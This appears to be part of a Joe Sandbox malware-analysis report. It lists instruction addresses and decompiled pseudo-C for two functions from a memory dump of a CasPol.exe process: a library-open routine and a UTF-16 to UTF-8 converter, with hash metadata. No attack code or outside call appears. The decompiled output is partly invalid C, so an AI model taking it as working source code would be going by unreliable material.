                                                                        0x013e5169
                                                                        0x013e516c
                                                                        0x013e5172
                                                                        0x013e5176
                                                                        0x013e517a
                                                                        0x013e517a
                                                                        0x013e517a
                                                                        0x013e517f
                                                                        0x01426d8b
                                                                        0x01426d8e
                                                                        0x01426d91
                                                                        0x01426d95
                                                                        0x01426d98
                                                                        0x01426d9c
                                                                        0x01426da0
                                                                        0x01426da3
                                                                        0x01426da7
                                                                        0x01426e26
                                                                        0x01426e26
                                                                        0x01426e2a
                                                                        0x013e51f9
                                                                        0x013e51f9
                                                                        0x013e51fe
                                                                        0x01426e33
                                                                        0x01426e33
                                                                        0x01426e39
                                                                        0x01426e3d
                                                                        0x01426e46
                                                                        0x01426e50
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426e52
                                                                        0x01426e53
                                                                        0x01426e56
                                                                        0x01426e5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426e5f
                                                                        0x01426e67
                                                                        0x01426e77
                                                                        0x01426e7f
                                                                        0x01426e80
                                                                        0x01426e88
                                                                        0x01426e90
                                                                        0x01426e9f
                                                                        0x01426ea5
                                                                        0x01426ea9
                                                                        0x01426eb1
                                                                        0x01426ebf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426ecf
                                                                        0x01426ed3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426edb
                                                                        0x01426ede
                                                                        0x01426ee1
                                                                        0x01426ee8
                                                                        0x01426eeb
                                                                        0x01426eed
                                                                        0x01426ef0
                                                                        0x01426ef4
                                                                        0x01426ef8
                                                                        0x01426efc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426f0d
                                                                        0x01426f11
                                                                        0x01426f32
                                                                        0x01426f37
                                                                        0x01426f3b
                                                                        0x01426f3e
                                                                        0x01426f41
                                                                        0x01426f46
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01426f4c
                                                                        0x01426f50
                                                                        0x01426f50
                                                                        0x01426f54
                                                                        0x01426f62
                                                                        0x01426f65
                                                                        0x01426f6d
                                                                        0x01426f7b
                                                                        0x01426f7b
                                                                        0x01426f93
                                                                        0x01426f98
                                                                        0x01426fa0
                                                                        0x01426fa6
                                                                        0x01426fb3
                                                                        0x01426fb6
                                                                        0x01426fbf
                                                                        0x01426fc1
                                                                        0x01426fd5
                                                                        0x01426fda
                                                                        0x01426fda
                                                                        0x01426fdd
                                                                        0x01426fe2
                                                                        0x01426fe7
                                                                        0x01426feb
                                                                        0x01426fef
                                                                        0x01426ff3
                                                                        0x013e520c
                                                                        0x013e520c
                                                                        0x013e520f
                                                                        0x013e5215
                                                                        0x013e5234
                                                                        0x013e523a
                                                                        0x013e523a
                                                                        0x013e5244
                                                                        0x013e5245
                                                                        0x013e5246
                                                                        0x013e5251
                                                                        0x013e5251
                                                                        0x01426f13
                                                                        0x01426f17
                                                                        0x01426f17
                                                                        0x01426f18
                                                                        0x01426f1b
                                                                        0x01426f1f
                                                                        0x01426f23
                                                                        0x00000000
                                                                        0x01426f28
                                                                        0x013e5204
                                                                        0x013e5204
                                                                        0x013e5208
                                                                        0x00000000
                                                                        0x013e5208
                                                                        0x013e5185
                                                                        0x013e5188
                                                                        0x013e518a
                                                                        0x013e518e
                                                                        0x013e5195
                                                                        0x01426db1
                                                                        0x01426db5
                                                                        0x01426db9
                                                                        0x013e519b
                                                                        0x013e519b
                                                                        0x013e519e
                                                                        0x013e51a7
                                                                        0x013e51a9
                                                                        0x013e51a9
                                                                        0x013e51b5
                                                                        0x013e51b8
                                                                        0x013e51bb
                                                                        0x013e51be
                                                                        0x013e51c1
                                                                        0x013e51c5
                                                                        0x013e51c9
                                                                        0x013e51cd
                                                                        0x013e51cd
                                                                        0x013e51d8
                                                                        0x013e51dc
                                                                        0x013e51e0
                                                                        0x01426dcc
                                                                        0x01426dd0
                                                                        0x01426dd5
                                                                        0x01426ddd
                                                                        0x01426de1
                                                                        0x01426de1
                                                                        0x01426de5
                                                                        0x01426deb
                                                                        0x01426df1
                                                                        0x01426df7
                                                                        0x01426dfd
                                                                        0x01426e01
                                                                        0x01426e05
                                                                        0x01426e09
                                                                        0x01426e0d
                                                                        0x01426e11
                                                                        0x01426e11
                                                                        0x013e51eb
                                                                        0x01426e1a
                                                                        0x01426e1f
                                                                        0x01426e21
                                                                        0x01426e23
                                                                        0x00000000
                                                                        0x013e51f1
                                                                        0x013e51f1
                                                                        0x00000000
                                                                        0x013e51f1

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa12071366be1f177a7411a0d5bee41e71eea5e848208d748b91020442f0d2ac
                                                                        • Instruction ID: 4f48b363e298a5addab4d8b7136ecb7f410c93c0f28466ae631e020718e93898
                                                                        • Opcode Fuzzy Hash: fa12071366be1f177a7411a0d5bee41e71eea5e848208d748b91020442f0d2ac
                                                                        • Instruction Fuzzy Hash: 66C133755083818FD354CF28C580A6AFBF1BF88318F54496EF9998B3A2D771E985CB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013E03E2 Relevance: .3, Instructions: 254COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E013E03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x14ad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E013E0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E013FB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E013CB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x14a7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E013D7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E013D7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01437016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E013F9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E014369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x14a7c04 != 0) {
						_t118 = _v12;
						_t120 = E0143A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x14a7bd8;
						if( *0x14a7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E013F95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E013F99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01433540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E013BB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E013FAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x14a8474 - 3;
										if( *0x14a8474 != 3) {
											 *0x14a79dc =  *0x14a79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E013D7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E013D7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01437016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x14a8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x14a7b00; // 0x0
							asm("ror esi, cl");
							 *0x14ab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E013F95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E013C7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                                                        0x013e03f1
                                                                        0x013e03f7
                                                                        0x013e03f9
                                                                        0x013e03fb
                                                                        0x013e03fd
                                                                        0x013e0400
                                                                        0x013e040a
                                                                        0x01424c7a
                                                                        0x013e0537
                                                                        0x013e0547
                                                                        0x013e0410
                                                                        0x013e0410
                                                                        0x013e0414
                                                                        0x013e0417
                                                                        0x013e041a
                                                                        0x013e0421
                                                                        0x013e0424
                                                                        0x013e042b
                                                                        0x013e043b
                                                                        0x013e043e
                                                                        0x013e043f
                                                                        0x013e043f
                                                                        0x013e0446
                                                                        0x013e0449
                                                                        0x013e044c
                                                                        0x013e044f
                                                                        0x013e0459
                                                                        0x01424c8d
                                                                        0x013e045f
                                                                        0x013e045f
                                                                        0x013e045f
                                                                        0x013e0467
                                                                        0x01424c97
                                                                        0x01424c9d
                                                                        0x01424ca4
                                                                        0x01424caa
                                                                        0x01424caf
                                                                        0x01424cb1
                                                                        0x01424cc3
                                                                        0x01424cb3
                                                                        0x01424cbc
                                                                        0x01424cbc
                                                                        0x01424cc8
                                                                        0x01424ccb
                                                                        0x01424cd7
                                                                        0x01424cda
                                                                        0x01424cdf
                                                                        0x01424cdf
                                                                        0x01424ccb
                                                                        0x01424ca4
                                                                        0x013e046d
                                                                        0x013e046f
                                                                        0x013e046f
                                                                        0x013e0471
                                                                        0x013e0476
                                                                        0x013e047a
                                                                        0x013e047b
                                                                        0x013e0483
                                                                        0x013e0489
                                                                        0x013e048d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424ce9
                                                                        0x01424cef
                                                                        0x01424d22
                                                                        0x01424d22
                                                                        0x00000000
                                                                        0x01424d22
                                                                        0x01424cf1
                                                                        0x01424cf7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424cf9
                                                                        0x01424cff
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424d05
                                                                        0x01424d07
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424d0d
                                                                        0x01424d0f
                                                                        0x01424d14
                                                                        0x01424d16
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424d1c
                                                                        0x01424d1c
                                                                        0x013e0499
                                                                        0x013e0535
                                                                        0x013e0535
                                                                        0x00000000
                                                                        0x013e0535
                                                                        0x013e04a6
                                                                        0x01424d2c
                                                                        0x01424d37
                                                                        0x01424d39
                                                                        0x01424d3b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424d41
                                                                        0x01424d48
                                                                        0x013e0527
                                                                        0x013e052b
                                                                        0x013e052d
                                                                        0x013e0530
                                                                        0x013e0530
                                                                        0x00000000
                                                                        0x013e052b
                                                                        0x01424d4e
                                                                        0x013e04ac
                                                                        0x013e04ac
                                                                        0x013e04af
                                                                        0x013e04b2
                                                                        0x013e04b7
                                                                        0x013e04b9
                                                                        0x013e04bb
                                                                        0x013e04bd
                                                                        0x013e04bf
                                                                        0x013e04c5
                                                                        0x013e04c9
                                                                        0x01424d53
                                                                        0x01424d59
                                                                        0x01424db9
                                                                        0x01424dba
                                                                        0x01424dbf
                                                                        0x01424dc2
                                                                        0x01424dc4
                                                                        0x01424dc7
                                                                        0x01424dce
                                                                        0x00000000
                                                                        0x01424dce
                                                                        0x01424d5b
                                                                        0x01424d61
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424d63
                                                                        0x01424d69
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424d6b
                                                                        0x01424d6e
                                                                        0x01424d74
                                                                        0x01424d76
                                                                        0x01424d7c
                                                                        0x01424d7e
                                                                        0x01424d84
                                                                        0x01424d89
                                                                        0x01424d8c
                                                                        0x01424d8d
                                                                        0x01424d92
                                                                        0x01424d95
                                                                        0x01424d96
                                                                        0x01424d98
                                                                        0x01424d9a
                                                                        0x01424d9f
                                                                        0x01424da4
                                                                        0x01424da6
                                                                        0x01424da8
                                                                        0x01424daf
                                                                        0x01424db1
                                                                        0x01424db1
                                                                        0x01424daf
                                                                        0x01424da6
                                                                        0x01424d84
                                                                        0x01424d7c
                                                                        0x00000000
                                                                        0x01424d74
                                                                        0x013e04d6
                                                                        0x01424de1
                                                                        0x013e04dc
                                                                        0x013e04dc
                                                                        0x013e04dc
                                                                        0x013e04e4
                                                                        0x01424deb
                                                                        0x01424df1
                                                                        0x01424df8
                                                                        0x01424dfe
                                                                        0x01424e03
                                                                        0x01424e05
                                                                        0x01424e17
                                                                        0x01424e07
                                                                        0x01424e10
                                                                        0x01424e10
                                                                        0x01424e1c
                                                                        0x01424e1f
                                                                        0x01424e35
                                                                        0x01424e35
                                                                        0x01424e1f
                                                                        0x01424df8
                                                                        0x013e04f1
                                                                        0x013e04fa
                                                                        0x01424e3f
                                                                        0x01424e47
                                                                        0x01424e5b
                                                                        0x01424e61
                                                                        0x01424e67
                                                                        0x01424e69
                                                                        0x01424e71
                                                                        0x01424e73
                                                                        0x013e0500
                                                                        0x013e0500
                                                                        0x013e0500
                                                                        0x013e04fa
                                                                        0x013e0508
                                                                        0x013e051d
                                                                        0x013e051d
                                                                        0x013e051f
                                                                        0x013e0524
                                                                        0x00000000
                                                                        0x013e0524
                                                                        0x013e0515
                                                                        0x013e0517
                                                                        0x01424e7a
                                                                        0x01424e7c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01424e85
                                                                        0x00000000
                                                                        0x01424e85
                                                                        0x00000000
                                                                        0x013e0517

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fb97bc0379606c7dd391847799829f688ac9c0e14164080f2a38d6217b770efd
                                                                        • Instruction ID: d41a566aa76f2c4340e33f0ac85dce38f6f4e1df59770e8b4b5f2e0f0e6918e4
                                                                        • Opcode Fuzzy Hash: fb97bc0379606c7dd391847799829f688ac9c0e14164080f2a38d6217b770efd
                                                                        • Instruction Fuzzy Hash: 0D911C31F043399BEB359A6CC848B6E7BE4EF05728F490266FA50A72E1D7749D41CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013EEBB0 Relevance: .2, Instructions: 250COMMONLIBRARYCODECrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E013EEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E013EED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                                                        0x013eebb8
                                                                        0x013eebbf
                                                                        0x013eebc1
                                                                        0x013eebc6
                                                                        0x00000000
                                                                        0x0142b6d6
                                                                        0x013eebcd
                                                                        0x013eebd2
                                                                        0x013eec95
                                                                        0x0142b6e0
                                                                        0x013eec9b
                                                                        0x013eeca1
                                                                        0x013eeca1
                                                                        0x013eec89
                                                                        0x00000000
                                                                        0x013eec89
                                                                        0x013eebd8
                                                                        0x013eebdd
                                                                        0x0142b6ea
                                                                        0x00000000
                                                                        0x013eebe3
                                                                        0x013eebe5
                                                                        0x013eebe7
                                                                        0x013eebef
                                                                        0x013eebf2
                                                                        0x00000000
                                                                        0x013eebf5
                                                                        0x00000000
                                                                        0x013eebf5
                                                                        0x013eebf5
                                                                        0x013eebf7
                                                                        0x0142b6f6
                                                                        0x013eec7c
                                                                        0x013eec7c
                                                                        0x013eec7f
                                                                        0x013eec82
                                                                        0x013eec87
                                                                        0x00000000
                                                                        0x013eec87
                                                                        0x013eec1a
                                                                        0x013eec1a
                                                                        0x013eec25
                                                                        0x0142b725
                                                                        0x0142b72c
                                                                        0x0142b72c
                                                                        0x013eec2d
                                                                        0x013eec31
                                                                        0x0142b73c
                                                                        0x0142b744
                                                                        0x0142b748
                                                                        0x0142b748
                                                                        0x0142b749
                                                                        0x0142b749
                                                                        0x0142b74a
                                                                        0x0142b74a
                                                                        0x013eec3e
                                                                        0x0142b860
                                                                        0x00000000
                                                                        0x013eec44
                                                                        0x013eec47
                                                                        0x0142b750
                                                                        0x0142b758
                                                                        0x0142b767
                                                                        0x0142b775
                                                                        0x0142b77c
                                                                        0x0142b77f
                                                                        0x0142b769
                                                                        0x0142b76c
                                                                        0x0142b76c
                                                                        0x0142b781
                                                                        0x0142b788
                                                                        0x0142b78b
                                                                        0x0142b75a
                                                                        0x0142b75d
                                                                        0x0142b75d
                                                                        0x0142b78d
                                                                        0x0142b792
                                                                        0x0142b793
                                                                        0x0142b793
                                                                        0x013eec54
                                                                        0x013eec56
                                                                        0x013eec57
                                                                        0x013eec59
                                                                        0x013eec5e
                                                                        0x013eecaa
                                                                        0x013eed16
                                                                        0x013eed16
                                                                        0x013eecac
                                                                        0x013eecaf
                                                                        0x013eecb4
                                                                        0x013eecb6
                                                                        0x013eecb6
                                                                        0x013eecb9
                                                                        0x013eecbf
                                                                        0x0142b7c1
                                                                        0x0142b7c8
                                                                        0x0142b7d3
                                                                        0x0142b7db
                                                                        0x0142b7ec
                                                                        0x0142b858
                                                                        0x00000000
                                                                        0x0142b858
                                                                        0x0142b7ee
                                                                        0x0142b7f1
                                                                        0x0142b7f4
                                                                        0x0142b7ff
                                                                        0x0142b850
                                                                        0x00000000
                                                                        0x0142b850
                                                                        0x0142b80a
                                                                        0x0142b813
                                                                        0x0142b81c
                                                                        0x0142b81d
                                                                        0x0142b822
                                                                        0x0142b825
                                                                        0x0142b828
                                                                        0x0142b831
                                                                        0x0142b832
                                                                        0x0142b837
                                                                        0x0142b840
                                                                        0x0142b842
                                                                        0x0142b845
                                                                        0x0142b848
                                                                        0x00000000
                                                                        0x0142b848
                                                                        0x0142b7df
                                                                        0x00000000
                                                                        0x0142b7df
                                                                        0x0142b7cc
                                                                        0x00000000
                                                                        0x0142b7cc
                                                                        0x013eecc5
                                                                        0x013eecc7
                                                                        0x013eeccb
                                                                        0x0142b79b
                                                                        0x0142b79e
                                                                        0x0142b7a4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142b7a6
                                                                        0x0142b7a8
                                                                        0x0142b7a8
                                                                        0x013eecd3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013eecd5
                                                                        0x013eecd5
                                                                        0x013eecd5
                                                                        0x013eecd8
                                                                        0x013eecda
                                                                        0x013eece4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013eecea
                                                                        0x013eeced
                                                                        0x013eecf0
                                                                        0x013eecf2
                                                                        0x013eecfb
                                                                        0x013eecfe
                                                                        0x013eed01
                                                                        0x013eed06
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013eed06
                                                                        0x0142b7ae
                                                                        0x0142b7b1
                                                                        0x0142b7b7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142b7b9
                                                                        0x0142b7bb
                                                                        0x013eed08
                                                                        0x013eed08
                                                                        0x013eed0c
                                                                        0x013eed0c
                                                                        0x00000000
                                                                        0x013eec60
                                                                        0x013eec62
                                                                        0x013eed0f
                                                                        0x013eed0f
                                                                        0x00000000
                                                                        0x013eed0f
                                                                        0x013eec68
                                                                        0x013eec6c
                                                                        0x013eec6f
                                                                        0x013eec75
                                                                        0x013eec0d
                                                                        0x013eec0d
                                                                        0x013eec18
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013eec18
                                                                        0x013eec77
                                                                        0x013eec79
                                                                        0x013eec79
                                                                        0x00000000
                                                                        0x013eec68
                                                                        0x013eec5e
                                                                        0x013eec3e
                                                                        0x013eebfd
                                                                        0x013eec02
                                                                        0x0142b701
                                                                        0x0142b70c
                                                                        0x0142b71b
                                                                        0x0142b71d
                                                                        0x0142b71d
                                                                        0x00000000
                                                                        0x0142b70c
                                                                        0x013eec08
                                                                        0x013eec0a
                                                                        0x00000000
                                                                        0x013eec0a
                                                                        0x013eebf5
                                                                        0x013eebf5

